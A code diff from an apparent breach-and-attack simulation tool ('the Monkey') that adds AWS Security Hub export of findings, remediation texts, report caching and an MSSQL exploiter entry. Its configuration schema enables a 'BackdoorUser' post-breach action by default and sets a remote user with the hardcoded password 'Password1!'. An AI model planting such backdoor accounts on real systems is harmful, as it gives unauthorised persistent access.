            instance_arn=instance_arn,
            instance_id=issue['aws_instance_id'] if 'aws_instance_id' in issue else None
        )

    @staticmethod
    def _handle_sambacry_issue(issue, instance_arn):
        return AWSExporter._build_generic_finding(
            severity=10,
            title="Samba servers are vulnerable to 'SambaCry'",
            description="Change {0}'s password to a complex one-use password that is not shared with other computers on the network. Update your Samba server to 4.4.14 and up, 4.5.10 and up, or 4.6.4 and up.".format(
                issue['username']),
            recommendation="The machine {0} ({1}) is vulnerable to a SambaCry attack. The Monkey authenticated over the SMB protocol with user {2} and its password, and used the SambaCry vulnerability.".format(
                issue['machine'], issue['ip_address'], issue['username']),
            instance_arn=instance_arn,
            instance_id=issue['aws_instance_id'] if 'aws_instance_id' in issue else None
        )

    @staticmethod
    def _handle_smb_pth_issue(issue, instance_arn):
        return AWSExporter._build_generic_finding(
            severity=5,
            title="Machines are accessible using passwords supplied by the user during the Monkey's configuration.",
            description="Change {0}'s password to a complex one-use password that is not shared with other computers on the network.".format(
                issue['username']),
            recommendation="The machine {0} ({1}) is vulnerable to an SMB attack. The Monkey used a pass-the-hash attack over the SMB protocol with user {2}.".format(
                issue['machine'], issue['ip_address'], issue['username']),
            instance_arn=instance_arn,
            instance_id=issue['aws_instance_id'] if 'aws_instance_id' in issue else None
        )

    @staticmethod
    def _handle_ssh_issue(issue, instance_arn):
        return AWSExporter._build_generic_finding(
            severity=1,
            title="Machines are accessible using SSH passwords supplied by the user during the Monkey's configuration.",
            description="Change {0}'s password to a complex one-use password that is not shared with other computers on the network.".format(
                issue['username']),
            recommendation="The machine {0} ({1}) is vulnerable to an SSH attack. The Monkey authenticated over the SSH protocol with user {2} and its password.".format(
                issue['machine'], issue['ip_address'], issue['username']),
            instance_arn=instance_arn,
            instance_id=issue['aws_instance_id'] if 'aws_instance_id' in issue else None
        )

    @staticmethod
    def _handle_ssh_key_issue(issue, instance_arn):
        return AWSExporter._build_generic_finding(
            severity=1,
            title="Machines are accessible using SSH keys supplied by the user during the Monkey's configuration.",
            description="Protect the {ssh_key} private key with a passphrase.".format(ssh_key=issue['ssh_key']),
            recommendation="The machine {machine} ({ip_address}) is vulnerable to an SSH attack. The Monkey authenticated over the SSH protocol with private key {ssh_key}.".format(
                machine=issue['machine'], ip_address=issue['ip_address'], ssh_key=issue['ssh_key']),
            instance_arn=instance_arn,
            instance_id=issue['aws_instance_id'] if 'aws_instance_id' in issue else None
        )

    @staticmethod
    def _handle_elastic_issue(issue, instance_arn):
        return AWSExporter._build_generic_finding(
            severity=10,
            title="Elastic Search servers are vulnerable to CVE-2015-1427",
            description="Update your Elastic Search server to version 1.4.3 and up.",
            recommendation="The machine {0} ({1}) is vulnerable to an Elastic Groovy attack. The attack was made possible because the Elastic Search server was not patched against CVE-2015-1427.".format(
                issue['machine'], issue['ip_address']),
            instance_arn=instance_arn,
            instance_id=issue['aws_instance_id'] if 'aws_instance_id' in issue else None
        )

    @staticmethod
    def _handle_island_cross_segment_issue(issue, instance_arn):
        return AWSExporter._build_generic_finding(
            severity=1,
            title="Weak segmentation - Machines from different segments are able to communicate.",
            description="Segment your network and make sure there is no communication between machines from different segments.",
            recommendation="The network can probably be segmented. A monkey instance on {0} in the networks {1} could directly access the Monkey Island server in the networks {2}.".format(
                issue['machine'], issue['networks'], issue['server_networks']),
            instance_arn=instance_arn,
            instance_id=issue['aws_instance_id'] if 'aws_instance_id' in issue else None
        )

    @staticmethod
    def _handle_shared_passwords_issue(issue, instance_arn):
        return AWSExporter._build_generic_finding(
            severity=1,
            title="Multiple users have the same password",
            description="Some users are sharing passwords; this should be fixed by changing passwords.",
            recommendation="These users are sharing access password: {0}.".format(issue['shared_with']),
            instance_arn=instance_arn,
            instance_id=issue['aws_instance_id'] if 'aws_instance_id' in issue else None
        )

    @staticmethod
    def _handle_shellshock_issue(issue, instance_arn):
        return AWSExporter._build_generic_finding(
            severity=10,
            title="Machines are vulnerable to 'Shellshock'",
            description="Update your Bash to a ShellShock-patched version.",
            recommendation="The machine {0} ({1}) is vulnerable to a ShellShock attack. "
                           "The attack was made possible because the HTTP server running on TCP port {2} was vulnerable to a shell injection attack on the paths: {3}.".format(
                issue['machine'], issue['ip_address'], issue['port'], issue['paths']),
            instance_arn=instance_arn,
            instance_id=issue['aws_instance_id'] if 'aws_instance_id' in issue else None
        )

    @staticmethod
    def _handle_smb_password_issue(issue, instance_arn):
        return AWSExporter._build_generic_finding(
            severity=1,
            title="Machines are accessible using passwords supplied by the user during the Monkey's configuration.",
            description="Change {0}'s password to a complex one-use password that is not shared with other computers on the network.".format(
                issue['username']),
            recommendation="The machine {0} ({1}) is vulnerable to an SMB attack. The Monkey authenticated over the SMB protocol with user {2} and its password.".format(
                issue['machine'], issue['ip_address'], issue['username']),
            instance_arn=instance_arn,
            instance_id=issue['aws_instance_id'] if 'aws_instance_id' in issue else None
        )

    @staticmethod
    def _handle_wmi_password_issue(issue, instance_arn):
        return AWSExporter._build_generic_finding(
            severity=1,
            title="Machines are accessible using passwords supplied by the user during the Monkey's configuration.",
            description="Change {0}'s password to a complex one-use password that is not shared with other computers on the network.".format(
                issue['username']),
            recommendation="The machine {machine} ({ip_address}) is vulnerable to a WMI attack. The Monkey authenticated over the WMI protocol with user {username} and its password.".format(
                machine=issue['machine'], ip_address=issue['ip_address'], username=issue['username']),
            instance_arn=instance_arn,
            instance_id=issue['aws_instance_id'] if 'aws_instance_id' in issue else None
        )

    @staticmethod
    def _handle_wmi_pth_issue(issue, instance_arn):
        return AWSExporter._build_generic_finding(
            severity=1,
            title="Machines are accessible using passwords supplied by the user during the Monkey's configuration.",
            description="Change {0}'s password to a complex one-use password that is not shared with other computers on the network.".format(
                issue['username']),
            recommendation="The machine {machine} ({ip_address}) is vulnerable to a WMI attack. The Monkey used a pass-the-hash attack over the WMI protocol with user {username}.".format(
                machine=issue['machine'], ip_address=issue['ip_address'], username=issue['username']),
            instance_arn=instance_arn,
            instance_id=issue['aws_instance_id'] if 'aws_instance_id' in issue else None
        )

    @staticmethod
    def _handle_rdp_issue(issue, instance_arn):
        return AWSExporter._build_generic_finding(
            severity=1,
            title="Machines are accessible using passwords supplied by the user during the Monkey's configuration.",
            description="Change {0}'s password to a complex one-use password that is not shared with other computers on the network.".format(
                issue['username']),
            recommendation="The machine {machine} ({ip_address}) is vulnerable to an RDP attack. The Monkey authenticated over the RDP protocol with user {username} and its password.".format(
                machine=issue['machine'], ip_address=issue['ip_address'], username=issue['username']),
            instance_arn=instance_arn,
            instance_id=issue['aws_instance_id'] if 'aws_instance_id' in issue else None
        )

    @staticmethod
    def _handle_shared_passwords_domain_issue(issue, instance_arn):
        return AWSExporter._build_generic_finding(
            severity=1,
            title="Multiple users have the same password.",
            description="Some domain users are sharing passwords; this should be fixed by changing passwords.",
            recommendation="These users are sharing access password: {shared_with}.".format(
                shared_with=issue['shared_with']),
            instance_arn=instance_arn,
            instance_id=issue['aws_instance_id'] if 'aws_instance_id' in issue else None
        )

    @staticmethod
    def _handle_shared_admins_domain_issue(issue, instance_arn):
        return AWSExporter._build_generic_finding(
            severity=1,
            title="Shared local administrator account - Different machines have the same account as a local administrator.",
            description="Make sure the right administrator accounts are managing the right machines, and that there isn't an unintentional local admin sharing.",
            recommendation="Here is a list of machines on which the account {username} is defined as an administrator: {shared_machines}".format(
                username=issue['username'], shared_machines=issue['shared_machines']),
            instance_arn=instance_arn,
            instance_id=issue['aws_instance_id'] if 'aws_instance_id' in issue else None
        )

    @staticmethod
    def _handle_strong_users_on_crit_issue(issue, instance_arn):
        return AWSExporter._build_generic_finding(
            severity=1,
            title="Mimikatz found login credentials of a user who has admin access to a server defined as critical.",
            description="This critical machine is open to attacks via strong users with access to it.",
            recommendation="The services: {services} have been found on the machine, thus classifying it as a critical machine. These users have access to it: {threatening_users}.".format(
                services=issue['services'], threatening_users=issue['threatening_users']),
            instance_arn=instance_arn,
            instance_id=issue['aws_instance_id'] if 'aws_instance_id' in issue else None
        )

    @staticmethod
    def _handle_struts2_issue(issue, instance_arn):
        return AWSExporter._build_generic_finding(
            severity=10,
            title="Struts2 servers are vulnerable to remote code execution.",
            description="Upgrade Struts2 to version 2.3.32 or 2.5.10.1 or any later version.",
            recommendation="Struts2 server at {machine} ({ip_address}) is vulnerable to a remote code execution attack. "
                           "The attack was made possible because the server is using an old version of the Jakarta-based file upload Multipart parser.".format(
                machine=issue['machine'], ip_address=issue['ip_address']),
            instance_arn=instance_arn,
            instance_id=issue['aws_instance_id'] if 'aws_instance_id' in issue else None
        )

    @staticmethod
    def _handle_weblogic_issue(issue, instance_arn):
        return AWSExporter._build_generic_finding(
            severity=10,
            title="Oracle WebLogic servers are vulnerable to remote code execution.",
            description="Install Oracle critical patch updates, or update to the latest version. "
                        "Vulnerable versions are 10.3.6.0.0, 12.1.3.0.0, 12.2.1.1.0 and 12.2.1.2.0.",
            recommendation="Oracle WebLogic server at {machine} ({ip_address}) is vulnerable to a remote code execution attack. "
                           "The attack was made possible due to incorrect permission assignment in Oracle Fusion Middleware (subcomponent: WLS Security).".format(
                machine=issue['machine'], ip_address=issue['ip_address']),
            instance_arn=instance_arn,
            instance_id=issue['aws_instance_id'] if 'aws_instance_id' in issue else None
        )

    @staticmethod
    def _handle_hadoop_issue(issue, instance_arn):
        return AWSExporter._build_generic_finding(
            severity=10,
            title="Hadoop/Yarn servers are vulnerable to remote code execution.",
            description="Run Hadoop in secure mode and add Kerberos authentication.",
            recommendation="The Hadoop server at {machine} ({ip_address}) is vulnerable to a remote code execution attack. "
                           "The attack was made possible due to the default Hadoop/Yarn configuration being insecure.".format(
                machine=issue['machine'], ip_address=issue['ip_address']),
            instance_arn=instance_arn,
            instance_id=issue['aws_instance_id'] if 'aws_instance_id' in issue else None
        )
@@ -0,0 +1,7 @@
class Exporter(object):
    def __init__(self):
        pass

    @staticmethod
    def handle_report(report_json):
        raise NotImplementedError
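For context, a minimal sketch of how a custom exporter could plug into this interface together with the ReportExporterManager added earlier in this diff; the class name and the log destination below are illustrative, not part of the commit:

```python
from cc.report_exporter_manager import ReportExporterManager
from cc.resources.exporter import Exporter


class LogFileExporter(Exporter):
    """Illustrative exporter that just dumps the report to a local file."""

    @staticmethod
    def handle_report(report_json):
        with open('/tmp/monkey_report.json', 'w') as f:  # hypothetical destination
            f.write(str(report_json))
        return True


# Registration mirrors what exporter_init.populate_exporter_list() does for AWSExporter.
ReportExporterManager().add_exporter_to_list(LogFileExporter)
```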
@@ -0,0 +1,24 @@
import json

import flask_restful
from flask import request, jsonify, abort

from cc.auth import jwt_required
from cc.services.config import ConfigService


class IslandConfiguration(flask_restful.Resource):
    @jwt_required()
    def get(self):
        return jsonify(schema=ConfigService.get_config_schema(),
                       configuration=ConfigService.get_config(False, True, True))

    @jwt_required()
    def post(self):
        config_json = json.loads(request.data)
        if 'reset' in config_json:
            ConfigService.reset_config()
        else:
            if not ConfigService.update_config(config_json, should_encrypt=True):
                abort(400)
        return self.get()
@@ -65,5 +65,7 @@ class Root(flask_restful.Resource):
        if not infection_done:
            report_done = False
        else:
            if is_any_exists:
                ReportService.get_report()
            report_done = ReportService.is_report_generated()
        return dict(run_server=True, run_monkey=is_any_exists, infection_done=infection_done, report_done=report_done)
@@ -191,6 +191,10 @@ class Telemetry(flask_restful.Resource):
        if 'wmi' in telemetry_json['data']:
            wmi_handler = WMIHandler(monkey_id, telemetry_json['data']['wmi'], users_secrets)
            wmi_handler.process_and_handle_wmi_info()
        if 'aws' in telemetry_json['data']:
            if 'instance_id' in telemetry_json['data']['aws']:
                mongo.db.monkey.update_one({'_id': monkey_id},
                                           {'$set': {'aws_instance_id': telemetry_json['data']['aws']['instance_id']}})

    @staticmethod
    def add_ip_to_ssh_keys(ip, ssh_info):
@@ -27,7 +27,9 @@ ENCRYPTED_CONFIG_ARRAYS = \
# This should be used for config values of string type
ENCRYPTED_CONFIG_STRINGS = \
    [
        ['cnc', 'aws_config', 'aws_access_key_id'],
        ['cnc', 'aws_config', 'aws_account_id'],
        ['cnc', 'aws_config', 'aws_secret_access_key']
    ]


@@ -38,11 +40,12 @@ class ConfigService:
        pass

    @staticmethod
    def get_config(is_initial_config=False, should_decrypt=True):
    def get_config(is_initial_config=False, should_decrypt=True, is_island=False):
        """
        Gets the entire global config.
        :param is_initial_config: If True, the initial config will be returned instead of the current config.
        :param should_decrypt: If True, all config values which are set as encrypted will be decrypted.
        :param is_island: If True, island-specific configuration parameters will be included.
        :return: The entire global config.
        """
        config = mongo.db.config.find_one({'name': 'initial' if is_initial_config else 'newconfig'}) or {}

@@ -50,6 +53,8 @@ class ConfigService:
            config.pop(field, None)
        if should_decrypt and len(config) > 0:
            ConfigService.decrypt_config(config)
        if not is_island:
            config.get('cnc', {}).pop('aws_config', None)
        return config

    @staticmethod

@@ -223,11 +228,15 @@ class ConfigService:
        ConfigService._encrypt_or_decrypt_config(config, False)

    @staticmethod
    def decrypt_flat_config(flat_config):
    def decrypt_flat_config(flat_config, is_island=False):
        """
        Same as decrypt_config but for a flat configuration
        """
        keys = [config_arr_as_array[2] for config_arr_as_array in (ENCRYPTED_CONFIG_ARRAYS + ENCRYPTED_CONFIG_STRINGS)]
        if is_island:
            keys = [config_arr_as_array[2] for config_arr_as_array in
                    (ENCRYPTED_CONFIG_ARRAYS + ENCRYPTED_CONFIG_STRINGS)]
        else:
            keys = [config_arr_as_array[2] for config_arr_as_array in ENCRYPTED_CONFIG_ARRAYS]
        for key in keys:
            if isinstance(flat_config[key], collections.Sequence) and not isinstance(flat_config[key], string_types):
                # Check if we are decrypting an SSH key pair
@ -1,6 +1,5 @@
|
|||
WARNING_SIGN = u" \u26A0"
|
||||
|
||||
|
||||
SCHEMA = {
|
||||
"title": "Monkey",
|
||||
"type": "object",
|
||||
|
@ -23,6 +22,13 @@ SCHEMA = {
|
|||
],
|
||||
"title": "WMI Exploiter"
|
||||
},
|
||||
{
|
||||
"type": "string",
|
||||
"enum": [
|
||||
"MSSQLExploiter"
|
||||
],
|
||||
"title": "MSSQL Exploiter"
|
||||
},
|
||||
{
|
||||
"type": "string",
|
||||
"enum": [
|
||||
|
@ -88,6 +94,19 @@ SCHEMA = {
|
|||
}
|
||||
]
|
||||
},
|
||||
"post_breach_acts": {
|
||||
"title": "Post breach actions",
|
||||
"type": "string",
|
||||
"anyOf": [
|
||||
{
|
||||
"type": "string",
|
||||
"enum": [
|
||||
"BackdoorUser"
|
||||
],
|
||||
"title": "Back door user",
|
||||
},
|
||||
],
|
||||
},
|
||||
"finger_classes": {
|
||||
"title": "Fingerprint class",
|
||||
"type": "string",
|
||||
|
@ -276,7 +295,19 @@ SCHEMA = {
|
|||
"type": "boolean",
|
||||
"default": True,
|
||||
"description": "Is the monkey alive"
|
||||
}
|
||||
},
|
||||
"post_breach_actions": {
|
||||
"title": "Post breach actions",
|
||||
"type": "array",
|
||||
"uniqueItems": True,
|
||||
"items": {
|
||||
"$ref": "#/definitions/post_breach_acts"
|
||||
},
|
||||
"default": [
|
||||
"BackdoorUser",
|
||||
],
|
||||
"description": "List of actions the Monkey will run post breach"
|
||||
},
|
||||
}
|
||||
},
|
||||
"behaviour": {
|
||||
|
@ -612,6 +643,31 @@ SCHEMA = {
|
|||
"description": "The current command server the monkey is communicating with"
|
||||
}
|
||||
}
|
||||
},
|
||||
'aws_config': {
|
||||
'title': 'AWS Configuration',
|
||||
'type': 'object',
|
||||
'description': 'These credentials will be used in order to export the monkey\'s findings to the AWS Security Hub.',
|
||||
'properties': {
|
||||
'aws_account_id': {
|
||||
'title': 'AWS account ID',
|
||||
'type': 'string',
|
||||
'description': 'Your AWS account ID that is subscribed to security hub feeds',
|
||||
'default': ''
|
||||
},
|
||||
'aws_access_key_id': {
|
||||
'title': 'AWS access key ID',
|
||||
'type': 'string',
|
||||
'description': 'Your AWS public access key ID, can be found in the IAM user interface in the AWS console.',
|
||||
'default': ''
|
||||
},
|
||||
'aws_secret_access_key': {
|
||||
'title': 'AWS secret access key',
|
||||
'type': 'string',
|
||||
'description': 'Your AWS secret access key id, you can get this after creating a public access key in the console.',
|
||||
'default': ''
|
||||
}
|
||||
}
|
||||
}
|
||||
}
|
||||
},
|
||||
|
@ -633,6 +689,7 @@ SCHEMA = {
|
|||
"default": [
|
||||
"SmbExploiter",
|
||||
"WmiExploiter",
|
||||
"MSSQLExploiter",
|
||||
"SSHExploiter",
|
||||
"ShellShockExploiter",
|
||||
"SambaCryExploiter",
|
||||
|
@ -664,14 +721,14 @@
    "default": 5,
    "description": "Number of attempts to exploit using MS08_067"
},
"ms08_067_remote_user_add": {
    "title": "MS08_067 remote user",
"user_to_add": {
    "title": "Remote user",
    "type": "string",
    "default": "Monkey_IUSER_SUPPORT",
    "description": "Username to add on successful exploit"
},
"ms08_067_remote_user_pass": {
    "title": "MS08_067 remote user password",
"remote_user_pass": {
    "title": "Remote user password",
    "type": "string",
    "default": "Password1!",
    "description": "Password to use for created user"
@ -805,7 +862,7 @@
"tcp_scan_interval": {
    "title": "TCP scan interval",
    "type": "integer",
    "default": 200,
    "default": 0,
    "description": "Time to sleep (in milliseconds) between scans"
},
"tcp_scan_timeout": {
@ -294,6 +294,10 @@ class NodeService:
    def is_monkey_finished_running():
        return NodeService.is_any_monkey_exists() and not NodeService.is_any_monkey_alive()

    @staticmethod
    def get_latest_modified_monkey():
        return mongo.db.monkey.find({}).sort('modifytime', -1).limit(1)

    @staticmethod
    def add_credentials_to_monkey(monkey_id, creds):
        mongo.db.monkey.update(
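
get_latest_modified_monkey returns a pymongo cursor sorted by modifytime descending and limited to one document; a minimal consumption sketch, matching how the report service uses it later in this diff:

from cc.services.node import NodeService

# Materialize the cursor; the first (and only) document is the newest monkey.
latest = list(NodeService.get_latest_modified_monkey())
if latest:
    latest_modify_time = latest[0]['modifytime']
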
@ -3,11 +3,14 @@ import functools

import ipaddress
import logging

from bson import json_util
from enum import Enum

from six import text_type

from cc.database import mongo
from cc.report_exporter_manager import ReportExporterManager
from cc.services.config import ConfigService
from cc.services.edge import EdgeService
from cc.services.node import NodeService
@ -37,7 +40,8 @@ class ReportService:
        'ShellShockExploiter': 'ShellShock Exploiter',
        'Struts2Exploiter': 'Struts2 Exploiter',
        'WebLogicExploiter': 'Oracle WebLogic Exploiter',
        'HadoopExploiter': 'Hadoop/Yarn Exploiter'
        'HadoopExploiter': 'Hadoop/Yarn Exploiter',
        'MSSQLExploiter': 'MSSQL Exploiter'
    }

    class ISSUES_DICT(Enum):
@ -52,7 +56,8 @@
        STRUTS2 = 8
        WEBLOGIC = 9
        HADOOP = 10
        PTH_CRIT_SERVICES_ACCESS = 11
        MSSQL = 12

    class WARNINGS_DICT(Enum):
        CROSS_SEGMENT = 0
@ -123,9 +128,9 @@
            'label': node['label'],
            'ip_addresses': node['ip_addresses'],
            'accessible_from_nodes':
                (x['hostname'] for x in
                list((x['hostname'] for x in
                     (NodeService.get_displayed_node_by_id(edge['from'], True)
                      for edge in EdgeService.get_displayed_edges_by_to(node['id'], True))),
                      for edge in EdgeService.get_displayed_edges_by_to(node['id'], True)))),
            'services': node['services']
        })
@ -326,6 +331,12 @@
        processed_exploit['type'] = 'hadoop'
        return processed_exploit

    @staticmethod
    def process_mssql_exploit(exploit):
        processed_exploit = ReportService.process_general_exploit(exploit)
        processed_exploit['type'] = 'mssql'
        return processed_exploit

    @staticmethod
    def process_exploit(exploit):
        exploiter_type = exploit['data']['exploiter']
@ -340,7 +351,8 @@
            'ShellShockExploiter': ReportService.process_shellshock_exploit,
            'Struts2Exploiter': ReportService.process_struts2_exploit,
            'WebLogicExploiter': ReportService.process_weblogic_exploit,
            'HadoopExploiter': ReportService.process_hadoop_exploit
            'HadoopExploiter': ReportService.process_hadoop_exploit,
            'MSSQLExploiter': ReportService.process_mssql_exploit
        }

        return EXPLOIT_PROCESS_FUNCTION_DICT[exploiter_type](exploit)
@ -540,12 +552,24 @@
        for issue in issues:
            if not issue.get('is_local', True):
                machine = issue.get('machine').upper()
                aws_instance_id = ReportService.get_machine_aws_instance_id(issue.get('machine'))
                if machine not in domain_issues_dict:
                    domain_issues_dict[machine] = []
                if aws_instance_id:
                    issue['aws_instance_id'] = aws_instance_id
                domain_issues_dict[machine].append(issue)
        logger.info('Domain issues generated for reporting')
        return domain_issues_dict

    @staticmethod
    def get_machine_aws_instance_id(hostname):
        aws_instance_id_list = list(mongo.db.monkey.find({'hostname': hostname}, {'aws_instance_id': 1}))
        if aws_instance_id_list:
            if 'aws_instance_id' in aws_instance_id_list[0]:
                return str(aws_instance_id_list[0]['aws_instance_id'])
        else:
            return None

    @staticmethod
    def get_issues():
        ISSUE_GENERATORS = [
@ -556,14 +580,18 @@
            PTHReportService.get_duplicated_passwords_issues,
            PTHReportService.get_strong_users_on_crit_issues
        ]

        issues = functools.reduce(lambda acc, issue_gen: acc + issue_gen(), ISSUE_GENERATORS, [])

        issues_dict = {}
        for issue in issues:
            if issue.get('is_local', True):
                machine = issue.get('machine').upper()
                aws_instance_id = ReportService.get_machine_aws_instance_id(issue.get('machine'))
                if machine not in issues_dict:
                    issues_dict[machine] = []
                if aws_instance_id:
                    issue['aws_instance_id'] = aws_instance_id
                issues_dict[machine].append(issue)
        logger.info('Issues generated for reporting')
        return issues_dict
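
For clarity, the shape of the data get_issues produces once the AWS enrichment above is applied (all values below are hypothetical):

# Issues grouped by upper-cased machine name; 'aws_instance_id' is present only
# when the matching monkey document carries one.
issues_dict = {
    'DC-1': [
        {
            'type': 'smb_password',
            'machine': 'dc-1',
            'is_local': True,
            'aws_instance_id': 'i-0123456789abcdef0',
        },
    ],
}
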
@ -625,6 +653,8 @@
                issues_byte_array[ReportService.ISSUES_DICT.STRUTS2.value] = True
            elif issue['type'] == 'weblogic':
                issues_byte_array[ReportService.ISSUES_DICT.WEBLOGIC.value] = True
            elif issue['type'] == 'mssql':
                issues_byte_array[ReportService.ISSUES_DICT.MSSQL.value] = True
            elif issue['type'] == 'hadoop':
                issues_byte_array[ReportService.ISSUES_DICT.HADOOP.value] = True
            elif issue['type'].endswith('_password') and issue['password'] in config_passwords and \
@ -659,26 +689,17 @@
    @staticmethod
    def is_report_generated():
        generated_report = mongo.db.report.find_one({'name': 'generated_report'})
        if generated_report is None:
            return False
        return generated_report['value']
        generated_report = mongo.db.report.find_one({})
        return generated_report is not None

    @staticmethod
    def set_report_generated():
        mongo.db.report.update(
            {'name': 'generated_report'},
            {'$set': {'value': True}},
            upsert=True)
        logger.info("Report marked as generated.")

    @staticmethod
    def get_report():
    def generate_report():
        domain_issues = ReportService.get_domain_issues()
        issues = ReportService.get_issues()
        config_users = ReportService.get_config_users()
        config_passwords = ReportService.get_config_passwords()
        cross_segment_issues = ReportService.get_cross_segment_issues()
        monkey_latest_modify_time = list(NodeService.get_latest_modified_monkey())[0]['modifytime']

        report = \
            {
@ -710,15 +731,59 @@
                {
                    'issues': issues,
                    'domain_issues': domain_issues
                },
                'meta':
                {
                    'latest_monkey_modifytime': monkey_latest_modify_time
                }
            }

        finished_run = NodeService.is_monkey_finished_running()
        if finished_run:
            ReportService.set_report_generated()
            ReportExporterManager().export(report)
            mongo.db.report.drop()
            mongo.db.report.insert_one(ReportService.encode_dot_char_before_mongo_insert(report))

        return report

    @staticmethod
    def encode_dot_char_before_mongo_insert(report_dict):
        """
        MongoDB doesn't allow '.' or '$' in a key's name, so this function replaces the '.' char with the
        ',,,' sequence instead.
        :return: dict with formatted keys (no dots).
        """
        report_as_json = json_util.dumps(report_dict).replace('.', ',,,')
        return json_util.loads(report_as_json)

    @staticmethod
    def is_latest_report_exists():
        """
        This function checks if a monkey report was already generated and if it's the latest one.
        :return: True if the report is the latest one, False if there is no report or it is not the latest.
        """
        latest_report_doc = mongo.db.report.find_one({}, {'meta.latest_monkey_modifytime': 1})

        if latest_report_doc:
            report_latest_modifytime = latest_report_doc['meta']['latest_monkey_modifytime']
            latest_monkey_modifytime = NodeService.get_latest_modified_monkey()[0]['modifytime']
            return report_latest_modifytime == latest_monkey_modifytime

        return False

    @staticmethod
    def decode_dot_char_before_mongo_insert(report_dict):
        """
        This function replaces the ',,,' sequence with the '.' char instead.
        :return: report dict with formatted keys (',,,' -> '.')
        """
        report_as_json = json_util.dumps(report_dict).replace(',,,', '.')
        return json_util.loads(report_as_json)

    @staticmethod
    def get_report():
        if ReportService.is_latest_report_exists():
            return ReportService.decode_dot_char_before_mongo_insert(mongo.db.report.find_one())
        return ReportService.generate_report()

    @staticmethod
    def did_exploit_type_succeed(exploit_type):
        return mongo.db.edge.count(
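
A quick round-trip sketch of the two dot-encoding helpers above, using bson.json_util as the code does (the report content is illustrative):

from bson import json_util

report = {'node.local': {'services': ['tcp-445']}}

encoded = json_util.loads(json_util.dumps(report).replace('.', ',,,'))
# {'node,,,local': {'services': ['tcp-445']}}  -- keys are now safe for MongoDB

decoded = json_util.loads(json_util.dumps(encoded).replace(',,,', '.'))
assert decoded == report
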
@ -24,7 +24,7 @@ class ConfigurePageComponent extends AuthComponent {
  }

  componentDidMount() {
    this.authFetch('/api/configuration')
    this.authFetch('/api/configuration/island')
      .then(res => res.json())
      .then(res => {
        let sections = [];

@ -44,7 +44,7 @@ class ConfigurePageComponent extends AuthComponent {
  onSubmit = ({formData}) => {
    this.currentFormData = formData;
    this.updateConfigSection();
    this.authFetch('/api/configuration',
    this.authFetch('/api/configuration/island',
      {
        method: 'POST',
        headers: {'Content-Type': 'application/json'},
@ -29,7 +29,8 @@ class ReportPageComponent extends AuthComponent {
    STRUTS2: 8,
    WEBLOGIC: 9,
    HADOOP: 10,
    PTH_CRIT_SERVICES_ACCESS: 11
    PTH_CRIT_SERVICES_ACCESS: 11,
    MSSQL: 12
  };

  Warning =

@ -341,6 +342,8 @@ class ReportPageComponent extends AuthComponent {
              <li>Hadoop/Yarn servers are vulnerable to remote code execution.</li> : null }
            {this.state.report.overview.issues[this.Issue.PTH_CRIT_SERVICES_ACCESS] ?
              <li>Mimikatz found login credentials of a user who has admin access to a server defined as critical.</li> : null }
            {this.state.report.overview.issues[this.Issue.MSSQL] ?
              <li>MS-SQL servers are vulnerable to remote code execution via the xp_cmdshell command.</li> : null }
          </ul>
        </div>
        :
@ -412,7 +415,6 @@ class ReportPageComponent extends AuthComponent {
        <div>
          {this.generateIssues(this.state.report.recommendations.issues)}
        </div>

      </div>
    );
  }
@ -867,7 +869,23 @@ class ReportPageComponent extends AuthComponent {
    );
  }

  generateMSSQLIssue(issue) {
    return (
      <li>
        Disable the xp_cmdshell option.
        <CollapsibleWellComponent>
          The machine <span className="label label-primary">{issue.machine}</span> (<span
          className="label label-info" style={{margin: '2px'}}>{issue.ip_address}</span>) is vulnerable to a <span
          className="label label-danger">MSSQL exploit attack</span>.
          <br/>
          The attack was possible because the target machine's MSSQL server configuration allows use of
          the xp_cmdshell command. To learn how to disable this feature, read <a
          href="https://docs.microsoft.com/en-us/sql/database-engine/configure-windows/xp-cmdshell-server-configuration-option?view=sql-server-2017">
          Microsoft's documentation.</a>
        </CollapsibleWellComponent>
      </li>
    );
  }

  generateIssue = (issue) => {
    let data;
@ -935,6 +953,9 @@ class ReportPageComponent extends AuthComponent {
      case 'hadoop':
        data = this.generateHadoopIssue(issue);
        break;
      case 'mssql':
        data = this.generateMSSQLIssue(issue);
        break;
    }
    return data;
  };
@ -14,4 +14,6 @@ netifaces
ipaddress
enum34
PyCrypto
boto3
awscli
virtualenv

@ -14,3 +14,5 @@ netifaces
ipaddress
enum34
PyCrypto
boto3
awscli